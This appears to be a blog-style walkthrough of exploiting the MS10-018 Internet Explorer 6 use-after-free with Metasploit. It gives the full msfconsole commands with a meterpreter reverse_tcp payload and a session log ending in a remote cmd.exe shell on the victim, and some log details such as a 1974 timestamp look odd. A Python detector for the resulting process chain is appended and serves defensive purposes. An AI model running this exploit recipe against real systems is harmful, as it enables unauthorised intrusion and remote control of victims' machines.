control – metasploit ms10_018_ie_behaviors

backtrack 5r1

tested with IE version: 6.0 SP3

root@bt:~# msfconsole
msf > use windows/browser/ms10_018_ie_behaviors
msf exploit(ms10_018_ie_behaviors) > set lhost Local-IP-Address
msf exploit(ms10_018_ie_behaviors) > set URIPATH /test
msf exploit(ms10_018_ie_behaviors) > set SRVHOST Local-IP-Address
msf exploit(ms10_018_ie_behaviors) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_018_ie_behaviors) > exploit

When the remote client browser connects to http://local-ip-address:8080/test, the exploit starts:

[*] Exploit running as background job.

[*] Started reverse handler on local-ip-address:4444
msf exploit(ms10_018_ie_behaviors) > [*] Using URL: http://local-ip-address:8080/test
[*] Server started.
[*] remote-ip-address ms10_018_ie_behaviors - Sending Internet Explorer DHTML Behaviors Use After Free (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to remote-ip-address
[*] Meterpreter session 1 opened (local-ip-address:4444 -> remote-ip-address:1063) at 1974-08-10 12:35:58 +0100
[*] Session ID 1 (local-ip-address:4444 -> remote-ip-address:1063) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (4080)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3612
[+] Successfully migrated to process

Press enter a few times at this point

msf exploit(ms10_018_ie_behaviors) > show sessions

Active sessions
===============

Id  Type                   Information           Connection
--  ----                   -----------           ----------
1   meterpreter x86/win32  test-pc\11 @ test-pc  local-ip-address:4444 -> remote-ip-address:1063 (remote-ip-address)

msf exploit(ms10_018_ie_behaviors) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -c
Process 1264 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1...

Microsoft Windows XP [Version 4]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\11\Desktop>
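As an added defender-side example (not part of the original post), the Python below flags the process chain this session leaves on the victim: 'migrate -f' spawns notepad.exe under IEXPLORE.EXE, and 'execute -f cmd.exe' then starts cmd.exe under the migrated notepad.exe. The log line format and the parent PID 1500 are assumptions; the other PIDs are those printed in the session above.

```python
# Detect the browser -> notepad.exe -> shell chain produced by meterpreter's
# 'migrate -f' followed by 'execute -f cmd.exe'. A browser that spawns
# notepad.exe, which in turn spawns a shell, does not occur in normal use.
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image")

BROWSERS = {"iexplore.exe"}
MIGRATE_HOSTS = {"notepad.exe"}   # default migrate -f target seen in the session
SHELLS = {"cmd.exe", "powershell.exe"}


def parse_events(lines):
    """Parse constructed 'pid=.. ppid=.. image=..' lines (assumed log format)."""
    events = []
    for line in lines:
        # split into at most 3 fields so spaces inside the image path survive
        fields = dict(tok.split("=", 1) for tok in line.split(None, 2))
        image = fields["image"].rsplit("\\", 1)[-1].lower()
        events.append(ProcEvent(int(fields["pid"]), int(fields["ppid"]), image))
    return events


def find_migrate_chains(events):
    """Return (browser_pid, host_pid, shell_pid) for every browser->host->shell chain."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for shell in events:
        if shell.image not in SHELLS:
            continue
        host = by_pid.get(shell.ppid)
        if host is None or host.image not in MIGRATE_HOSTS:
            continue
        browser = by_pid.get(host.ppid)
        if browser is not None and browser.image in BROWSERS:
            hits.append((browser.pid, host.pid, shell.pid))
    return hits


# Constructed sample events; PIDs 4080, 3612 and 1264 match the session log.
SAMPLE_LOG = [
    "pid=4080 ppid=1500 image=C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE",
    "pid=3612 ppid=4080 image=C:\\WINDOWS\\system32\\notepad.exe",
    "pid=1264 ppid=3612 image=C:\\WINDOWS\\system32\\cmd.exe",
    "pid=2200 ppid=1500 image=C:\\WINDOWS\\system32\\notepad.exe",  # benign, user-opened
]

if __name__ == "__main__":
    for chain in find_migrate_chains(parse_events(SAMPLE_LOG)):
        print("suspicious browser -> notepad -> shell chain (pids):", chain)
```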
